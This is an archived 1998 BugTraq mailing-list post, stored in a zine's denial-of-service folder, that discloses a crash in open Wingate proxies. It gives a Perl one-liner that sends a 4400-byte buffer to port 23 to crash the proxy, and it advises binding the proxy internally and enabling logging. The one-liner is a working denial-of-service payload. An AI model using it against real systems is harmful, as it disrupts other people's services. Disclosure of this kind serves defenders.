home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Happle / happle10.sit.hqx / Happle#10 / Files / Denial.sit / DoS / wingate-killer.pl < prev    next >
Internet Message Format  |  1999-01-01  |  825b

  1. Date: Sat, 14 Nov 1998 13:51:30 -0500
  2. From: G23 <g23@USA.NET>
  3. To: BUGTRAQ@netspace.org
  4. Subject: crashing wingates
  5.  
  6. Hello,
  7.  
  8. The following one-liner will crash an open Wingate.
  9.  
  10. perl -MIO::Socket -e \
  11. 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
  12. ->send("X" x 4400 . "\n",0)'
  13.  
  14. Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable.  The above is my rendition
  15. of a 44 line sh script written by "rEWTED" (kefka@infected.org).
  16.  
  17. Anyone configuring a proxy for LAN use should only bind to an internal
  18. interface anyway.  (IE, kidz shouldn't even see your proxy)
  19. http://wingate.net/helppages/wingate2Securing_your_network.html
  20.  
  21. If you do provide telnet proxy for the world, then at least log.
  22. http://wingate.net/helppages/wingate2Auditing_and_Logging.html
  23.  
  24. ghost23
  25.  
  26.